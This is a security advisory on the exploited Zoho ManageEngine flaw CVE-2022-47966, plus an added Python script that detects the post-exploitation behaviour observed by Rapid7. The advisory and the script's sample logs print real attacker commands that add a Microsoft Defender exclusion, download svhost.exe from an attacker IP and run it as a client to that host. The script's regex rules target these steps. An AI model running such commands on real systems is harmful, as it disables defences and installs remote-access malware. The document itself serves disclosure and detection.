UPDATE: 2/27/2023 - Last month, Avertium published the below Flash Notice regarding a Zoho ManageEngine (CVE-2022-47966) vulnerability being exploited in the wild. The vulnerability is a pre-authentication remote code execution vulnerability stemming from an outdated version of the Apache Santuario library and was found in two dozen ManageEngine products.
While the vulnerability has been patched, there is a growing number of threat actors exploiting the flaw. CVE-2022-47966 allows for full takeover of the compromised system by unauthenticated attackers and victims are located across the globe within various industries. Based on the analysis of Bitdefender’s researchers, 2,000 to 4,000 servers accessible from the internet are still running at least one of the vulnerable versions of Apache Santuario.
Bitdefender stated that the existing PoC is not capable of exploiting all servers, as SAML configuration is required. However, it is highly recommended that all businesses running vulnerable versions patch immediately. Please see the link to ManageEngine’s patch guidance mentioned in our original Flash Notice below.
A vulnerability was found in two dozen ManageEngine products which is currently being exploited in the wild. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.
CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Patches were released between October and November 2022, but the timing of the fixed version releases varies by product.
During testing, researchers from Rapid7 found that some products may be more exploitable than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept code (PoC), but successful attackers would need to obtain two additional pieces of information to modify the PoC.
As previously stated, an obsolete version of the Apache Santuario library, which implements security requirements for XML, was the cause of the vulnerability. A SAML request with an incorrect signature can be used to exploit the issue if SAML single sign-on is currently or has previously been enabled on those products.
Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine’s advisory patch immediately.
Please read ManageEngine’s advisory for updated product and version information, as well as patch guidance.
Post Exploitation MITRE ATT&CK Techniques (observed by Rapid7)
powershell -windowstyle hidden set-mppreference –
set-mppreference -exclusionpath c:\users\public
invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe
c:\users\public\svhost.exe client 111.68.7[.]122:8080
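The commands above are a small, recognisable chain: a hidden PowerShell window, a Defender exclusion added for C:\Users\Public, a download from the attacker host, and execution of the dropped binary from that folder. The following is an added detection example (not part of Avertium's or Rapid7's notice) that scans process-creation log lines for those behaviours and for the IP published in the notice. The log format, the host and user names, the parent processes and all sample events are constructed for this example; the ATT&CK technique mapping is this example's own reading of the observed commands.

```python
"""Added example: scan process-creation log lines for the post-exploitation
behaviours listed in the notice (hidden PowerShell window, Defender exclusion,
download from the attacker host, execution from C:\\Users\\Public).
The log format and every sample event below are constructed for this example."""
import re
from collections import defaultdict

# IoC from the notice (printed there defanged as 111.68.7[.]122), refanged
# here so it can be matched against raw log text.
NOTICE_IOC_IPS = {"111.68.7.122"}

# Behavioural rules: (rule name, ATT&CK technique, regex over the command line).
# The ATT&CK mapping is this example's own, not the notice's.
RULES = [
    ("defender_exclusion_added", "T1562.001",
     re.compile(r"set-mppreference\b.*?-exclusionpath\b", re.I)),
    ("hidden_powershell_window", "T1564.003",
     re.compile(r"powershell(\.exe)?\b.*?-w(indowstyle)?\s+hidden\b", re.I)),
    # Invoke-WebRequest fetching a bare-IP URL or an executable/script file;
    # ordinary intranet file downloads do not fire this rule.
    ("executable_or_ip_download", "T1105",
     re.compile(r"invoke-webrequest\b.*?-uri\s+https?://"
                r"(\d{1,3}(?:\.\d{1,3}){3}|\S+\.(?:exe|dll|ps1)\b)", re.I)),
    # An .exe launched from the world-writable C:\Users\Public folder.
    ("exec_from_users_public", "T1036.005",
     re.compile(r"(?:^|\s)[a-z]:\\users\\public\\\S+\.exe\b", re.I)),
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed records in the form ts|host|user|parent|cmdline. The first three
# mirror the notice's observed chain; the last two are benign noise.
SAMPLE_LOG = """\
2023-01-19T10:02:11Z|srv-manageengine|NT AUTHORITY\\SYSTEM|java.exe|powershell -windowstyle hidden set-mppreference -exclusionpath c:\\users\\public
2023-01-19T10:02:13Z|srv-manageengine|NT AUTHORITY\\SYSTEM|powershell.exe|powershell invoke-webrequest -uri http://111.68.7.122:8081/svhost.exe -outfile c:\\users\\public\\svhost.exe
2023-01-19T10:02:15Z|srv-manageengine|NT AUTHORITY\\SYSTEM|powershell.exe|c:\\users\\public\\svhost.exe client 111.68.7.122:8080
2023-01-19T10:05:00Z|ws-finance-07|CORP\\alice|explorer.exe|powershell -noprofile get-childitem c:\\users\\alice\\documents
2023-01-19T10:06:30Z|ws-it-02|CORP\\bob|cmd.exe|powershell invoke-webrequest -uri https://intranet.example.local/tools/report.csv -outfile c:\\temp\\report.csv
"""


def parse_event(line):
    """Split one constructed 'ts|host|user|parent|cmdline' record into a dict."""
    ts, host, user, parent, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmdline": cmdline}


def match_event(event):
    """Return the names of the rules and IoCs that fire on a single event."""
    hits = [name for name, _tech, rx in RULES if rx.search(event["cmdline"])]
    for ip in IPV4_RE.findall(event["cmdline"]):
        if ip in NOTICE_IOC_IPS:
            hits.append("ioc_ip:" + ip)
    return hits


def triage(log_text):
    """Group hits per host. A host with two or more distinct indicators is
    escalated: the observed chain (exclusion, download, execution) shows up as
    several events on the same machine within minutes, not as one event."""
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for hit in match_event(ev):
            per_host[ev["host"]].append((ev["ts"], hit))
    return {
        host: {"hits": hits, "escalate": len({h for _, h in hits}) >= 2}
        for host, hits in per_host.items()
    }


if __name__ == "__main__":
    for host, result in triage(SAMPLE_LOG).items():
        print(f"{host}: {'ESCALATE' if result['escalate'] else 'review'}")
        for ts, hit in result["hits"]:
            print(f"  {ts}  {hit}")
```

Run against the constructed sample, only srv-manageengine is reported, with all five indicators firing across its three events, while the two benign workstation commands produce nothing. Escalating on a combination of indicators rather than on any single rule keeps the Invoke-WebRequest and hidden-window rules usable in environments where administrators legitimately use both.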